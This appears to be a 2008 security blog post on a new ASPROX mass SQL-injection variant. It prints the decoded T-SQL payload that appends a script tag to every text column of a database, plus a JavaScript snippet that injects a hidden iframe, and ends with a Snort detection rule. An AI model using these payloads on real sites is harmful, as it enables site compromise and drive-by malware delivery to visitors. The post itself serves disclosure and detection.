Monday, July 7, 2008

ASPROX Payload Morphed NGG.JS

New domains found and new javascript payload "ngg.js" replaced the previous "b.js".

And it doesn't seem to be wasting any time:
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)

New SQL Injection Payload (HEX DECODED):

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT, FROM sysobjects a,syscolumns b WHERE AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''script src= /script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Whats in ngg.js? Familiar iframe attack from before but this time selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India. Lovely :)

var cookieString = document.cookie;
var start = cookieString.indexOf("updngg=");
if (start != -1){}else{
var expires = new Date();
document.cookie = "updngg=update;expires="+expires.toGMTString();
document.write("iframe src= width=0 height=0 frameborder=0>/iframe");

New ASPROX domains spotted:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Snort signature to detect access of infected site:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX Infected Site - ngg.js Request"; flow:established,to_server;
uricontent:"/ngg.js"; classtype:trojan-activity; reference:url,; rev:1; sid:4000002;)

And finally go here to download Sentinel IPS' ASPROX Information Toolkit

No comments: